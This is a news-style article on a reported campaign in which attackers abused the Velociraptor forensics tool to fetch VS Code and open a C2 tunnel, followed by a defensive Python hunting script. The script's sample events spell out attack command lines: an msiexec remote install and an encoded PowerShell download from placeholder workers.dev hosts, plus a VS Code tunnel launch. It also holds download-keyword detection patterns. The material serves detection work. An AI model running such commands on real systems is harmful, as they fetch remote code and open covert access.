Cybersecurity researchers have uncovered a new cyberattack in which hackers abused Velociraptor, a legitimate open-source security tool, to carry out malicious activity.
According to a report from the Sophos Counter Threat Unit, the unknown threat actors used Velociraptor to download and run the widely used code editor Visual Studio Code, most likely to create a covert communication tunnel to a command-and-control (C2) server.
While attackers commonly rely on legitimate tools in so-called “living-off-the-land” (LotL) techniques, this case shows a shift. Instead of deploying malware directly, the attackers used Velociraptor, typically employed in digital forensics and incident response, to gain control of compromised systems.
The researchers found that the attackers used the Windows utility msiexec to download an installer from a Cloudflare Workers domain. The installer set up Velociraptor, which then connected to another Cloudflare Workers domain. From there, the attackers downloaded Visual Studio Code using an encoded PowerShell command, enabling remote access and potential code execution.
Further malicious tools were also downloaded using the same msiexec method.
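The chain described above (msiexec pulling an installer from a remote URL, Velociraptor spawning an encoded PowerShell download, Visual Studio Code started in tunnel mode) leaves distinctive traces in process-creation telemetry. The following is an added hunting example written for this article; it is not code from the report, from Sophos or from the Velociraptor project. The event field names (`ts`, `parent`, `image`, `cmdline`) are an assumption about a flattened Sysmon Event ID 1 or Windows 4688 export rather than a vendor schema, the sample events and their `workers.dev` placeholder hostnames are constructed, and the `code.exe tunnel` rule assumes the VS Code CLI's remote-tunnel subcommand is what "communication tunnel" refers to, which the article only states as likely.

```python
"""Hunt for the Velociraptor-abuse chain in process-creation events.

Added example: constructed events and assumed field names, not the report's data.
"""
import base64
import re
from typing import Dict, Iterable, List

Event = Dict[str, str]


def _b64_utf16(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: the four stages of the chain plus one benign local install.
# Hostnames are placeholders, not the infrastructure named in the report.
SAMPLE_EVENTS: List[Event] = [
    {"ts": "2025-01-01T10:00:01Z", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i https://placeholder-worker.workers.dev/installer.msi /qn"},
    {"ts": "2025-01-01T10:00:09Z", "parent": "services.exe", "image": "Velociraptor.exe",
     "cmdline": "Velociraptor.exe --config client.config.yaml client"},
    {"ts": "2025-01-01T10:01:20Z", "parent": "Velociraptor.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _b64_utf16(
         "Invoke-WebRequest -Uri https://placeholder-worker.workers.dev/vscode.zip "
         "-OutFile C:\\ProgramData\\vscode.zip")},
    {"ts": "2025-01-01T10:02:00Z", "parent": "powershell.exe", "image": "code.exe",
     "cmdline": "C:\\ProgramData\\vscode\\code.exe tunnel"},
    # Benign control: msiexec installing from a local path, no URL, no shell spawned.
    {"ts": "2025-01-01T11:00:00Z", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Windows\\Temp\\7zip.msi /qn"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common spellings of -EncodedCommand (PowerShell accepts unambiguous prefixes);
# a heuristic, not an exhaustive list.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)
DOWNLOAD_HINTS = ("invoke-webrequest", "downloadstring", "downloadfile",
                  "net.webclient", "start-bitstransfer", "iwr ", "http")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if none is present/valid."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def _finding(ev: Event, rule: str, detail: str) -> Event:
    return {"ts": ev["ts"], "rule": rule, "image": ev["image"], "detail": detail}


def hunt(events: Iterable[Event]) -> List[Event]:
    """Apply the four chain-specific rules to each event and collect findings."""
    findings: List[Event] = []
    for ev in events:
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
        # Stage 1: msiexec fetching an installer directly from a URL.
        if image == "msiexec.exe" and URL_RE.search(cmd):
            findings.append(_finding(ev, "msiexec_remote_install", cmd))
        if image in ("powershell.exe", "pwsh.exe"):
            # Stage 3: encoded command that, once decoded, performs a download.
            decoded = decode_encoded_command(cmd)
            if decoded and any(h in decoded.lower() for h in DOWNLOAD_HINTS):
                findings.append(_finding(ev, "encoded_powershell_download", decoded.strip()))
            # Stage 2: the Velociraptor client acting as parent of a shell.
            if parent == "velociraptor.exe":
                findings.append(_finding(ev, "velociraptor_spawns_shell", cmd))
        # Stage 4: VS Code CLI started in tunnel mode (assumed meaning of "tunnel").
        if image == "code.exe" and re.search(r"\btunnel\b", cmd, re.IGNORECASE):
            findings.append(_finding(ev, "vscode_tunnel", cmd))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['ts']}  {f['rule']:<28} {f['image']}  {f['detail'][:80]}")
```

Running the script prints one finding per stage and nothing for the benign local install. The `velociraptor_spawns_shell` rule needs tuning in estates that legitimately run Velociraptor, because hunts that collect PowerShell artifacts also spawn shells from the client: the higher-value signals there are a Velociraptor binary appearing on hosts it was never deployed to, or a client whose configuration points at a server your own team does not operate.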